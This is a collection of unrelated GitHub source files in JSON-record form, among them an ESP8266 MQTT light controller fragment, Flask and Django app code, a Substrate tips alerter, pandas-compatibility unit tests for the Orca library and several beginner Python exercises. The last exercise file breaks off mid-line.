str(ujson.dumps(status['rgb'])))\r\n savestate()\r\n ctrlm_raise = False\r\n ctrlm_dimming = False\r\n############################################mood######################################\r\n if (time.time() - last_message) > float(message_interval):\r\n try:\r\n client.publish(ROOT_TOPIC + b'white/state', str(ujson.dumps(status['white'])))\r\n client.publish(ROOT_TOPIC + b'rgb/state', str(ujson.dumps(status['rgb'])))\r\n last_message = time.time()\r\n except:\r\n print(\"error sending\")\r\n client = connect_and_subscribe() \r\n elif time.time() < last_message:\r\n last_message = time.time()\r\n sleep(.1)\r\n except KeyboardInterrupt:\r\n print('Interrupted')\r\n os._exit(0)\r\n except:\r\n machine.reset()\r\n################# main for light ########################\r\n","repo_name":"Doug-Wyman/ESP8266_MQTT_light","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"42996621824","text":"class Figu:\r\n def Cono(self):\r\n r = float(input(\"digite la el radio: \"))\r\n a = float(input(\"digite la altura: \"))\r\n Volumen1 = ((r ** 2 * a) / 3) * 3.141592\r\n print(\"El volumen del cono es:\", \"{0:.2f}\".format(Volumen1))\r\n\r\n def Cilindro(self):\r\n r = float(input(\"Ingrese el radio: \"))\r\n a = float(input(\"Ingrese la altura: \"))\r\n Volumen2 = 3.141592 * r ** 2 * a\r\n print(\"El volumen del cilindro es:\", \"{0:.2f}\".format(Volumen2))\r\n\r\n def Esfera(self):\r\n r = float(input(\"Ingrese el radio: \"))\r\n Volumen3 = (4 / 3) * 3.141592 * r ** 3\r\n print(\"El volumen de la esfera es: \", \"{0:.2f}\".format(Volumen3))\r\n\r\n\r\nclass CEsfera(Figu):\r\n def formula(self):\r\n self.Esfera()\r\n\r\n\r\nclass CCilindro(Figu):\r\n def formula(self):\r\n self.Cilindro()\r\n\r\n\r\nclass CCono(Figu):\r\n def formula(self):\r\n self.Cono()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(\"Opciones\\n1. Esfera 2. Cilindro 3. Cono\")\r\n Opcion = int(input('Que opcion desea utilizar: '))\r\n\r\n try:\r\n if Opcion == 1:\r\n CEsfera().formula()\r\n elif Opcion == 2:\r\n CCilindro().formula()\r\n elif Opcion == 3:\r\n CCono().formula()\r\n except:print(\"opcion no valida.\")","repo_name":"jorgemartino/Programacion-III","sub_path":"Quiz#2.py","file_name":"Quiz#2.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71576144422","text":"from flask import abort\r\nfrom config import db\r\nfrom note_model import Note, NoteSchema\r\nfrom person_model import Person, PersonSchema\r\n# GET /notes\r\n# POST /people/{person_id}/notes\r\n# GET /people/{person_id}/notes/{note_id}\r\n# PUT /people/{person_id}/notes/{note_id}\r\n# DELETE /people/{person_id}/notes/{note_id}\r\n\r\ndef read_all():\r\n notes = Note.query.outerjoin(Person).all()\r\n\r\n note_schema = NoteSchema(many=True)\r\n results = note_schema.dump(notes)\r\n\r\n return results\r\n\r\n\r\ndef create(person_id, note):\r\n person = {\r\n Person.query.filter(Person.person_id == person_id)\r\n .outerjoin(Note)\r\n .one_or_more()\r\n }\r\n \r\n if person is None:\r\n abort (404, f\"Person with id {person_id} is not found\")\r\n\r\n content = note.get(\"content\")\r\n new_note = Note(content = content, person_id = Person.id)\r\n\r\n person.notes.append(new_note)\r\n\r\n db.session.commit()\r\n\r\n note_schema = NoteSchema()\r\n\r\n result = note_schema(new_note)\r\n\r\n return result\r\n\r\ndef read_one(person_id, note_id):\r\n note = (Note.query.filter(Note.note_id == note_id)\r\n .filter(Person.person_id == person_id)\r\n .one_or_none()\r\n )\r\n \r\n print(note)\r\n\r\n if note is None:\r\n abort(404, 'Note with id {note_id} own by person {person_id} is not found')\r\n\r\n note_schema = NoteSchema()\r\n result = note_schema.dump(note)\r\n\r\n return result\r\n\r\ndef update(person_id, note_id, note):\r\n found_note = {\r\n Note.query.join(Person, Person.person_id == Note.person_id)\r\n .filter(Note.note_id == note_id)\r\n .one_or_none()\r\n }\r\n\r\n if found_note is None:\r\n abort(404, 'Note with id {note_id} own by person {person_id} is not found')\r\n\r\n found_note.content = note.get(\"content\")\r\n\r\n db.merge(found_note)\r\n db.session.commit()\r\n\r\n note_schema = NoteSchema()\r\n result = note_schema.dump(found_note)\r\n\r\n return result","repo_name":"jovanhidayat/trainingPhython","sub_path":"sesi5b/note_controller.py","file_name":"note_controller.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31922924704","text":"import json\r\nimport os\r\nimport statistics\r\nimport asyncio\r\nimport deepdiff\r\n\r\nfrom subalert.base import Utils, SubQuery\r\n\r\nfrom .config import Configuration\r\nfrom .subq import Queue\r\n\r\nqueue = Queue()\r\n\r\n\r\nclass TipsSubscription:\r\n def __init__(self):\r\n self.config = Configuration()\r\n self.utils = Utils()\r\n self.subquery = SubQuery()\r\n self.substrate = self.config.substrate\r\n self.ticker = self.config.yaml_file['chain']['ticker']\r\n self.hashtag = str(self.config.yaml_file['twitter']['hashtag'])\r\n self.loop = asyncio.get_event_loop()\r\n\r\n def has_tips_updated(self):\r\n \"\"\"\r\n :return: check if tips data has updated since you last checked.\r\n \"\"\"\r\n tip_construct = []\r\n\r\n if not os.path.isfile('data-cache/tips.cache'):\r\n self.utils.cache_data('data-cache/tips.cache', self.subquery.tips_info())\r\n\r\n cached_tips_data = self.utils.open_cache('data-cache/tips.cache')\r\n\r\n difference = deepdiff.DeepDiff(cached_tips_data, self.subquery.tips_info(), ignore_order=True).to_json()\r\n result = json.loads(difference)\r\n\r\n if len(result) == 0:\r\n print(\"🔧 No changes to commission have been found since the last execution\")\r\n exit(1)\r\n\r\n tips_construct = {\"tips\": []}\r\n\r\n for key, value in result.items():\r\n # type_change ['closes'] goes from null to an integer value (block height) of when the tip will be closed.\r\n if key == 'dictionary_item_added':\r\n for tip_hash in value:\r\n tip_hash = tip_hash.replace(\"root['\", \"\").replace(\"']\", \"\").replace(\"['finders_fee\", \"\")\r\n reason = self.subquery.tip_reason(self.subquery.tip_info(tip_hash)['reason'])\r\n\r\n tweet_body = (\r\n f\"🖐️A new tip has been proposed.\\n\\n\"\r\n f\"{reason}\\n\\n\"\r\n f\"https://www.dotreasury.com/{self.ticker}/tips/{tip_hash}\"\r\n )\r\n tips_construct['tips'].append(tweet_body)\r\n queue.enqueue(tips_construct)\r\n elif key == 'type_changes':\r\n for tip_hash, attributes in result[key].items():\r\n if 'closes' in tip_hash:\r\n tip_hash = tip_hash.replace(\"root['\", \"\").replace(\"']\", \"\").replace(\"['closes\", \"\")\r\n reason = self.subquery.tip_reason(cached_tips_data[tip_hash]['reason'])\r\n close_height = attributes['new_value']\r\n tip_values = []\r\n\r\n # tips_data[tip_hash]['tips'] = tuple: (tipper, amount)\r\n for tipper, amount in self.subquery.tips_info()[tip_hash]['tips']:\r\n tip_values.append(amount)\r\n\r\n median = statistics.median(tip_values) / 10 ** self.substrate.token_decimals\r\n\r\n if median <= 0.0:\r\n pass\r\n else:\r\n tweet_body = (\r\n f\"💰Tip closed for {median} {self.ticker}\\n\\n\"\r\n f\"{reason}\\n\\n\"\r\n f\"payout scheduled on block {close_height:,}\\n\\n\"\r\n f\"https://www.dotreasury.com/{self.ticker}/tips/{tip_hash}\"\r\n )\r\n\r\n tips_construct['tips'].append(tweet_body)\r\n queue.enqueue(tips_construct)\r\n else:\r\n continue\r\n\r\n if queue.size() >= 1:\r\n task = self.loop.create_task(queue.process_queue())\r\n self.loop.run_until_complete(task)\r\n\r\n self.utils.cache_data('data-cache/tips.cache', self.subquery.tips_info())\r\n","repo_name":"Nadro-J/py-subalert","sub_path":"subalert/tips.py","file_name":"tips.py","file_ext":"py","file_size_in_byte":3834,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"27911860443","text":"menu = {\n \"Appetizers\": [\"Wings\", \"Cookies\", \"Spring Rolls\"],\n \"Entrees\": [\"Salmon\", \"Steak Meat\", \"Tornado\", \"A Literal Garden\"],\n \"Desserts\": [\"Ice Cream\", \"Cake\", \"Pie\"],\n \"Beverages\": [\"Coffee\", \"Tea\", \"Unicorn Tears\"],\n}\n\norder = {}\n\n\ndef welcome():\n print(\n \"\"\"\n**************************************\n** Welcome to the Snakes Cafe! **\n** Please see our menu below. **\n** **\n** To quit at any time, type \"quit\" **\n**************************************\n\"\"\"\n )\n\n\ndef displayMenu(menu):\n for category in menu:\n print(\"\")\n print(category)\n print(\"----------\" + \"\\n\")\n for item in menu[category]:\n print(item)\n print(\"\")\n\n print(\n \"\"\"\n***********************************\n** What would you like to order? **\n***********************************\n\"\"\"\n )\n\n\ndef user_insertion():\n user_input = input(\">\")\n words = user_input.split(\" \")\n for i in range(len(words)):\n words[i] = words[i].title()\n user_input = \" \".join(words)\n return user_input\n\n\ndef main():\n customer_order = user_insertion()\n while customer_order != \"Quit\":\n if any(customer_order in values for values in menu.values()):\n if customer_order in order:\n order[customer_order] += 1\n else:\n order[customer_order] = 1\n print(\n f\"** {order[customer_order]} order of {customer_order} has been added to your meal **\"\n )\n else:\n print(\"sorry we dont have this item !\")\n\n customer_order = user_insertion()\n\n end_application()\n\n\ndef end_application():\n print(\"thanks for using snakes cafe application !\")\n\n\n# invoke the function\n# if __name__==\"__main__\":\nwelcome()\ndisplayMenu(menu)\nmain()\n","repo_name":"Malik-Essa99/snakes-cafe","sub_path":"snakes_cafe.py","file_name":"snakes_cafe.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39167920648","text":"from rest_framework.views import APIView\nfrom rest_framework.response import Response\nimport requests\nimport json\nimport os\n\nclass YourView(APIView):\n def post(self, request):\n data = request.data # Access the JSON payload from the request body\n print(data)\n stocks = []\n for stock in data['stocks']:\n stocks.append(stock[0])\n stockData = self.getStockData(data['startDate'], stocks)\n #stockTotals = self.calculateStocks(data['initialBalance'], data['stocks'])\n \n return Response(stockData)\n \n def getStockData(self, startDate, stocks):\n params = {\n 'access_key': os.environ.get(\"access_key\"),\n 'symbols': stocks,\n 'date_from': startDate,\n }\n api_result = requests.get('http://api.marketstack.com/v1/eod', params)\n\n api_response = api_result.json()\n print(json.dumps(api_response, indent=4))\n for stock_data in api_response['data']:\n print(u'Ticker %s has a day high of %s on %s' % (\n stock_data['symbol'],\n stock_data['high'],\n stock_data['date']\n ))\n \n return api_response \n\n def calculateStocks(self, total, stocks):\n stockTotals = {}\n # percentage return = (returned amount - initial investment) / initial investment\n for stock in stocks:\n stockName = stock[0]\n stockPercentage = stock[1]\n stockTotals[stockName] = (total * (stockPercentage/100))\n\n return stockTotals\n\n ","repo_name":"ALee888/portfolio_calc_backend","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6472057412","text":"# coding=utf-8\nimport calendar\nimport datetime\nimport json\n\nfrom django import forms\nfrom django.contrib.auth import get_user_model\nfrom django.core.mail import EmailMessage\nfrom django_celery_beat.models import PeriodicTask, IntervalSchedule, CrontabSchedule\n\nfrom send_email import models\n\nUSER_MODEL = get_user_model()\n\n\nclass MyModelChoiceField(forms.ModelMultipleChoiceField):\n def label_from_instance(self, obj):\n return obj.username\n\n\nclass FormEmail(forms.Form):\n users = MyModelChoiceField(label=\"Пользователи\", queryset=USER_MODEL.objects.all(), )\n email_layout = forms.ModelChoiceField(label=\"Email шаблоны\", queryset=models.EmailLayout.objects.all(), )\n\n def send_email(self):\n users = self.cleaned_data[\"users\"]\n email_layout = self.cleaned_data[\"email_layout\"].path_layout\n\n for user in users:\n birthday = user.subscriber.birthday\n birthday_context = calendar.timegm(birthday.timetuple())\n\n schedule, _ = CrontabSchedule.objects.get_or_create(\n minute=\"*\",\n hour=12,\n day_of_week=\"*\",\n day_of_month=birthday.day,\n month_of_year=birthday.month,\n )\n\n context = {\"first_name\": user.first_name,\n \"last_name\": user.last_name,\n \"birthday\": birthday_context}\n\n task, _ = PeriodicTask.objects.get_or_create(\n name=\"Birthday {username} {birthday}\".format(username=user.username,\n birthday=birthday),\n crontab=schedule,\n task=\"send_email.tasks.send_message\",\n kwargs=json.dumps({\n \"context\": context,\n \"email_layout\": email_layout,\n \"user_email\": user.email,\n \"username\": user.username\n }),\n )\n","repo_name":"NaborSlov/email_link_test_case","sub_path":"send_email/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"11029538799","text":"def parse():\n insertion_rules={}\n with open(\"input.txt\") as file:\n lines = file.readlines()\n\n template = lines[0].strip()\n\n for line in lines[2:]:\n key, value = line.strip().split(' -> ')\n insertion_rules[key] = value\n\n print(insertion_rules)\n\n return template, insertion_rules\n\ndef part_one(template, insertion_rules):\n step = 1\n while step <= 10:\n temp = ''\n #print(template)\n char_counts = {}\n for (idx, c) in enumerate(template):\n temp += c\n if c not in char_counts:\n char_counts[c] = 0\n char_counts[c] += 1\n\n if idx+1 < len(template):\n ins = insertion_rules[c+template[idx+1]]\n temp += ins\n\n if ins not in char_counts:\n char_counts[ins] = 0\n char_counts[ins] += 1\n\n template = temp\n #print(f\"After step {step}: {template}\")\n print(char_counts)\n print(step, max(char_counts.values()) - min(char_counts.values()), len(template))\n step += 1\n\n\ndef part_two(template, insertion_rules):\n base_pairs = {k: 0 for k,_ in insertion_rules.items()}\n pairs = dict(base_pairs)\n\n # create initial pairs\n for i in range(0, len(template)-1):\n pairs[template[i:i+2]] += 1\n\n step = 1\n while step <= 40:\n temp = dict(base_pairs)\n\n for pair in pairs:\n temp[pair[0]+insertion_rules[pair]] += pairs[pair]\n temp[insertion_rules[pair] + pair[1]] += pairs[pair]\n\n pairs = temp\n step += 1\n\n char_counts = {v: 0 for v in insertion_rules.values()}\n for pair in pairs:\n char_counts[pair[0]] += pairs[pair]\n char_counts[pair[1]] += pairs[pair]\n char_counts[template[0]] += 1\n char_counts[template[-1]] += 1\n\n print((max(char_counts.values())-min(char_counts.values()))/2)\n \n\ntemplate, insertion_rules = parse()\npart_one(template, insertion_rules)\nprint(\"---------------------\")\npart_two(template, insertion_rules)\n\n","repo_name":"tully2003/aoc-2021","sub_path":"day-14/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9882148862","text":"from string import ascii_lowercase as alphabet\n\nif __name__ == '__main__':\n\n my_str = 'abc'\n my_list = []\n\n for lettre in alphabet[:10]:\n my_list.append(lettre)\n\n decalage = 0\n for chiffre in range(1, 10):\n position = chiffre + decalage\n decalage += 1\n my_list.insert(position, chiffre)\n\n print(my_list)\n\n position = len(my_list) - 1\n while position >= 0:\n print(my_list[position], end=' ')\n position -= 1\n\n print()\n index = 0\n for element in my_list:\n if str(element) not in alphabet:\n if element % 2 == 1:\n print(my_list[index - 1], end=\" \")\n index += 1\n\n # Exercice 3\n def somme_liste(liste):\n return sum(liste)\n\n print(somme_liste([1, 2, 3, 4]))\n\n # Exercice 4\n liste = [1, 2, 3, 4, 5]\n print(liste)\n if 4 in liste:\n print('4 est dans la liste')\n else:\n print('4 n\\'est pas dans la liste')\n\n liste[0] = 17\n # print(liste)\n\n liste[2] = liste[1] + liste[3]\n # print(liste)\n\n liste[0], liste[-1] = liste[-1], liste[0]\n # print(liste)\n\n for chiffre in liste:\n print(chiffre)\n","repo_name":"PierreAnken/TrainingPython","sub_path":"student_exercices/Tommaso/Test3.py","file_name":"Test3.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14665964162","text":"import unittest\nimport orca\nfrom setup.settings import *\nfrom pandas.util.testing import *\n\n\nclass DataFrameReashapingTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n # connect to a DolphinDB server\n orca.connect(HOST, PORT, \"admin\", \"123456\")\n\n def test_dataframe_reshaping_sorting_transposing_droplevel(self):\n pdf = pd.DataFrame([[1, 2, 3, 4],\n [5, 6, 7, 8],\n [9, 10, 11, 12]\n ]).set_index([0, 1]).rename_axis(['a', 'b'])\n\n pdf.columns = pd.MultiIndex.from_tuples([\n ('c', 'e'), ('d', 'f')\n ], names=['level_1', 'level_2'])\n odf = orca.DataFrame(pdf)\n assert_frame_equal(pdf.droplevel('a'), odf.droplevel('a').to_pandas())\n # TODO:NotImplementedError: Orca does not support axis == 1\n # assert_frame_equal(pdf.droplevel('level_2',axis=1), odf.droplevel('level_2',axis=1).to_pandas())\n\n def test_dataframe_reshaping_sorting_transposing_pivot(self):\n pdf = pd.DataFrame({'foo': ['one', 'one', 'one', 'two', 'two', 'two'],\n 'bar': ['A', 'B', 'C', 'A', 'B', 'C'],\n 'baz': [1, 2, 3, 4, 5, 6],\n 'zoo': [2, 4, 5, 6, 4, 7]})\n odf = orca.DataFrame(pdf)\n ptable = pdf.pivot(index='foo', columns='bar', values='baz')\n otable = odf.pivot(index='foo', columns='bar', values='baz')\n assert_frame_equal(otable.to_pandas(), ptable)\n\n # TODO:orca不支持多个values\n ptable = pdf.pivot(index='foo', columns='bar', values=['baz', 'zoo'])\n # otable = odf.pivot(index='foo', columns='bar', values=['baz', 'zoo'])\n # assert_frame_equal(otable.to_pandas(), ptable)\n # TODO:orcab不支持下标\n ptable = pdf.pivot(index='foo', columns='bar')['baz']\n # otable = odf.pivot(index='foo', columns='bar')['baz']\n # assert_frame_equal(otable.to_pandas(), ptable)\n # TODO:orca不支持index,columns参数为多个列组成的list\n\n def test_dataframe_reshaping_sorting_transposing_pivot_table(self):\n pdf = pd.DataFrame({\"A\": [\"foo\", \"foo\", \"foo\", \"foo\", \"foo\", \"bar\", \"bar\", \"bar\", \"bar\"],\n \"B\": [\"one\", \"one\", \"one\", \"two\", \"two\", \"one\", \"one\", \"two\", \"two\"],\n \"C\": [\"small\", \"large\", \"large\", \"small\", \"small\", \"large\", \"small\", \"small\", \"large\"],\n \"D\": [1, 2, 2, 3, 3, 4, 5, 6, 7],\n \"E\": [2, 4, 5, 5, 6, 6, 8, 9, 9]})\n odf = orca.DataFrame(pdf)\n ptable = pdf.pivot_table(values='D', index='A', columns='C', aggfunc=\"sum\")\n otable = odf.pivot_table(values='D', index='A', columns='C', aggfunc=\"sum\")\n assert_frame_equal(otable.to_pandas(), ptable)\n\n pdf = pd.DataFrame({\"time\": pd.date_range(\"15:00:00\", periods=9, freq=\"30s\"),\n \"A\": [\"foo\", \"foo\", \"foo\", \"foo\", \"foo\", \"bar\", \"bar\", \"bar\", \"bar\"],\n \"B\": [\"one\", \"one\", \"one\", \"two\", \"two\", \"one\", \"one\", \"two\", \"two\"],\n \"C\": [\"small\", \"large\", \"large\", \"small\", \"small\", \"large\", \"small\", \"small\", \"large\"],\n \"D\": [1, 2, 2, 3, 3, 4, 5, 6, 7],\n \"E\": [2, 4, 5, 5, 6, 6, 8, 9, 9],\n \"F\": [2, 4, 5, 5, 6, 6, 8, 9, 9]})\n odf = orca.DataFrame(pdf)\n ptable = pdf.pivot_table(values='D', index=pdf.time.dt.minute, columns='A', aggfunc=\"sum\")\n otable = odf.pivot_table(values='D', index=odf.time.dt.minute, columns='A', aggfunc=\"sum\")\n assert_frame_equal(otable.to_pandas(), ptable)\n ptable = pdf.pivot_table(values='D', index='A', columns=pdf.time.dt.minute, aggfunc=\"sum\")\n otable = odf.pivot_table(values='D', index='A', columns=odf.time.dt.minute, aggfunc=\"sum\")\n # TODO:DIFFERENT COLNAME\n # assert_frame_equal(otable.to_pandas(), ptable)\n\n # TODO:orca不支持index,columns参数为多个列组成的list\n\n def test_dataframe_reshaping_sorting_transposing_reorder_levels(self):\n arrays = [np.array(['bar', 'bar', 'baz', 'baz', 'foo', 'foo', 'qux', 'qux']),\n np.array(['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two'])]\n pdf = pd.DataFrame(np.random.randn(8, 4), index=arrays)\n odf = orca.DataFrame(pdf)\n assert_frame_equal(odf.reorder_levels([1, 0], axis=0).to_pandas(), pdf.reorder_levels([1, 0], axis=0))\n\n def test_dataframe_reshaping_sorting_transposing_stack(self):\n pdf = pd.DataFrame([[0, 1], [2, 3]], index=['cat', 'dog'], columns=['weight', 'height'])\n odf = orca.DataFrame(pdf)\n # TODO: orca的结果不分组\n # assert_series_equal(odf.stack().to_pandas(), pdf.stack())\n pdf = pd.DataFrame([[1, 2], [2, 4]], index=['cat', 'dog'],\n columns=pd.MultiIndex.from_tuples([('weight', 'kg'), ('weight', 'pounds')]))\n odf = orca.DataFrame(pdf)\n # TODO: orca不支持multi level columns\n # assert_series_equal(odf.stack().to_pandas(), pdf.stack())\n pdf = pd.DataFrame({\"time\": pd.date_range(\"15:00:00\", periods=9, freq=\"30s\"),\n \"A\": [\"foo\", \"foo\", \"foo\", \"foo\", \"foo\", \"bar\", \"bar\", \"bar\", \"bar\"],\n \"B\": [\"one\", \"one\", \"one\", \"two\", \"two\", \"one\", \"one\", \"two\", \"two\"],\n \"C\": [\"small\", \"large\", \"large\", \"small\", \"small\", \"large\", \"small\", \"small\", \"large\"],\n \"D\": [1, 2, 2, 3, 3, 4, 5, 6, 7],\n \"E\": [2, 4, 5, 5, 6, 6, 8, 9, 9],\n \"F\": [2, 4, 5, 5, 6, 6, 8, 9, 9]})\n odf = orca.DataFrame(pdf)\n ptable = pdf.pivot_table(values='D', index=pdf.time.dt.minute, columns='A', aggfunc=\"sum\")\n otable = odf.pivot_table(values='D', index=odf.time.dt.minute, columns='A', aggfunc=\"sum\")\n # TODO: orca的结果不分组\n # assert_series_equal(otable.stack().to_pandas(), ptable.stack())\n\n def test_dataframe_reshaping_sorting_transposing_transpose_T(self):\n pdf = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4]})\n odf = orca.DataFrame(pdf)\n assert_frame_equal(odf.T.to_pandas(), pdf.T)\n assert_frame_equal(odf.transpose().to_pandas(), pdf.transpose())\n assert_frame_equal(odf.transpose(copy=True).to_pandas(), pdf.transpose(copy=True))\n\n # TODO:transpose on non-numerical types of matrix is not allowed in Orca\n pdf = pd.DataFrame({'name': ['Alice', 'Bob'], 'grade': ['A', 'B'], 'Gender': ['female', 'male']})\n odf = orca.DataFrame(pdf)\n\n def test_dataframe_reshaping_sorting_transposing_melt(self):\n pdf = pd.DataFrame({\"time\": pd.date_range(\"15:00:00\", periods=9, freq=\"30s\"),\n \"A\": [\"foo\", \"foo\", \"foo\", \"foo\", \"foo\", \"bar\", \"bar\", \"bar\", \"bar\"],\n \"B\": [\"one\", \"one\", \"one\", \"two\", \"two\", \"one\", \"one\", \"two\", \"two\"],\n \"C\": [\"small\", \"large\", \"large\", \"small\", \"small\", \"large\", \"small\", \"small\", \"large\"],\n \"D\": [1, 2, 2, 3, 3, 4, 5, 6, 7],\n \"E\": [2, 4, 5, 5, 6, 6, 8, 9, 9],\n \"F\": [2, 4, 5, 5, 6, 6, 8, 9, 9]})\n odf = orca.DataFrame(pdf)\n ptable=pdf.melt(id_vars=['A', 'B'], value_vars=['D', 'E'])\n otable = odf.melt(id_vars=['A', 'B'], value_vars=['D', 'E'])\n assert_frame_equal(otable.to_pandas(), ptable)\n\n ptable = pdf.melt(id_vars='A', value_vars='D', var_name=\"myVarname\", value_name=\"myValname\")\n otable = odf.melt(id_vars='A', value_vars='D', var_name=\"myVarname\", value_name=\"myValname\")\n assert_frame_equal(otable.to_pandas(), ptable)\n\n pdf = pd.DataFrame({'A': {0: 101, 1: 102, 2: 103}, 'B': {0: 1, 1: 3, 2: 5}, 'C': {0: 2, 1: 4, 2: 6}})\n odf = orca.DataFrame(pdf)\n ptable = pdf.melt()\n otable = odf.melt()\n assert_frame_equal(otable.to_pandas(), ptable)\n\n ptable = pdf.melt(id_vars=['A'])\n otable = odf.melt(id_vars=['A'])\n assert_frame_equal(otable.to_pandas(), ptable)\n\n ptable = pdf.melt(value_vars=['A'])\n otable = odf.melt(value_vars=['A'])\n assert_frame_equal(otable.to_pandas(), ptable)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"dolphindb/Orca","sub_path":"tests/orca_unit_testing/test_dataframe_reshaping_sorting.py","file_name":"test_dataframe_reshaping_sorting.py","file_ext":"py","file_size_in_byte":8420,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"35"} +{"seq_id":"1548674035","text":"#Creator: Saksham Singh\n#Stage: Beta\n#Purpose: 1 - 2 variable equations\n#Purpose: Tell user if values are true or false\n#Last update: 2/9/19\n#________________________________________________________________________________________________\n\nprint(\"Version: Beta\")\nprint(\"This program will tell you if the values you entered for an equation are true\")\n\n#Asking value\n\ncoeff = float(input(\"Coefficient of the first variable: \"))\ncoeff2 = float(input(\"Coefficient of the second variable: \"))\noperation = input(\"Enter the operator in between the two variables/coefficients: \")\nendnum = float(input(\"Enter the equality: \"))\n\n#Creating something for multiplying the two coefficents\n\nendvar1 = coeff * var1\nendvar2 = coeff2 * var2\n\n#Finding out the operator\n\nif operation == \"+\":\n equation = endvar1 + endvar2\nif operation == \"*\" or operation ==\"x\" or operation == \"X\":\n equation = endvar1 * endvar2\nif operation == \"-\":\n equation = endvar1 - endvar2\nif operation == \"/\":\n equation = endvar1/endvar2\nif operation == \"^\":\n equation = endvar1^endvar2\n\n#End result\n\nif equation == endnum:\n print(\"YEEEEEEET. Those coordinates are on the line of your equation! (Those values make the equation true)! \")\nelse:\n print(\"Uh, oh. Those values don't work!\")\n","repo_name":"rks27/pythonLearning","sub_path":"saksham/Variable Equations.py","file_name":"Variable Equations.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25521120249","text":"import requests\n\n\nclass Clearwater:\n def __init__(self):\n self.host = 'https://www.clearwatertrackingsystem.com/api/v1'\n self.api_key = your_api_key\n self.headers = {'Accept': 'application/json'}\n\n def get_all_vessels(self):\n url = f'{self.host}/vessel?api_key={self.api_key}'\n response = requests.get(url, self.headers)\n\n if response.status_code != 200:\n return print('Error: '+response.json().get('message'))\n return response.json()\n\n def get_vessel_by_imo(self, imo: int):\n for vessel in self.get_all_vessels():\n if vessel.get('imo') == imo:\n return vessel\n else:\n return 'Vessel not found'\n\n def get_vessel_by_clearwater_id(self, clearwater_id: int):\n url = f'{self.host}/vessel/{clearwater_id}?api_key={self.api_key}'\n response = requests.get(url, self.headers)\n\n if response.status_code != 200:\n return print('Error: '+response.json().get('message'))\n return response.json()\n\n def get_all_alerts(self):\n url = f'{self.host}/alert?api_key={self.api_key}'\n response = requests.get(url, self.headers)\n\n if response.status_code != 200:\n return print('Error: '+response.json().get('message'))\n return response.json()\n\n def get_specific_alert(self, alert_id):\n url = f'{self.host}/alert/{alert_id}?api_key={self.api_key}'\n response = requests.get(url, self.headers)\n\n if response.status_code != 200:\n return print('Error: '+response.json().get('message'))\n return response.json()\n","repo_name":"owenvachell/clearwater_api_examples","sub_path":"clearwater.py","file_name":"clearwater.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14608798965","text":"# ПРИМЕР 1.\n# список пользователей, которые нужно проверить:\nusers = ['alice', 'brian', 'candace']\n\n# пустой список для хранения проверенных пользователей\nconfirmed_users = []\n\n# проверяем пользователей в users, пока остаются непроверенные.\n# проверенные пользователи перемещаются в confirmed_users\nwhile users:\n user = users.pop()\n print(f\"{user} is verifying\") # candace is verifying brian is verifying alice is verifying\n confirmed_users.append(user)\n\n# вывод проверенных пользователей\nfor confirmed_user in confirmed_users:\n print(confirmed_user) # candace brian alice\n\n# ПРИМЕР 2.\n# удаление всех вхождений конкретного значения cat в списке pets\npets = [\"cat\", 'dog', 'cat', 'rabbit', 'fish', 'cat']\n\nwhile 'cat' in pets:\n pets.remove('cat')\n\nprint(pets) # ['dog', 'rabbit', 'fish']\n\n# ПРИМЕР 3.\n# заполнение словаря данными, введенными пользователем\nresponses = {}\n\n# установка флага на продолжение опроса\npolling_active = True\nwhile polling_active:\n name = input(\"Enter your name: \")\n response = input('How are you feeling today? ')\n\n# Ответ сохраняется в словаре\n responses[name] = response\n\n# проверка продолжения опроса\n repeat = input('Would you add your mood? yes \\ no ')\n\n if repeat == 'no':\n polling_active = False\n# опрос завершен\n\n# выведем результаты опроса:\nprint('---Poll results---')\nfor name, response in responses.items():\n print(f\"{name}`s mood for today is: {response}\")\n\n# Упражнение 7.8 стр. 142\npizza_orders = ['pepperoni', 'four_seasons', 'mozarella', 'mushrooms']\n\nfinished_pizzas = []\n\nwhile pizza_orders:\n pizza_order = pizza_orders.pop()\n print(f\"{pizza_order} is cooking\")\n finished_pizzas.append(pizza_order)\n\nfor finished_pizza in finished_pizzas:\n print(finished_pizza)\n\n# Упражнение 7.9 стр. 142\npizzas = ['pepperoni', 'four_seasons','pepperoni', 'mozarella', 'mushrooms', 'pepperoni']\n\nmessage = 'Pepperoni not cooking'\n\nwhile 'pepperoni' in pizzas:\n print(message)\n pizzas.remove('pepperoni')\n\nprint(pizzas)\n\n# Упражнение 7.10 стр. 142\n\ndict = {}\nPolling_continue = True\nwhile Polling_continue:\n name = input('Enter U name: ')\n city = input('Enter U city: ')\n dict[name] = city\n\n message = input('Do U want to continue? y \\ n')\n if message == 'n':\n Polling_continue = 